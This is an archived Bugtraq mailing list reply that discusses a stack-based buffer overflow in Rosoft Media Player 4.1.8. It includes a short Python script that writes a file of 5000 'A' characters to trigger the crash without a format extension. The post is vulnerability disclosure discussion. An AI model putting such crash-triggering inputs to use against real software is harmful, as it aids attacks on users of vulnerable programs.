lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 17 Mar 2008 23:27:31 -0000
From: opexoc@...il.com
To: bugtraq@...urityfocus.com
Subject: Re: Re: Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow

>> I know this because I "tasted" the exploit without extension.

Actually, this is not the proof that the vulnerability is not connected with format, because program could read the file and judge that if this program has M3U format or RML or something else. But if we try following code we are sure:

#!/usr/bin/python
content = (
"A" * 5000 + "\n"
)

fd = open("music","w");
fd.write(content)
fd.close();
print "FILE CREATED" 

Wiktor

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ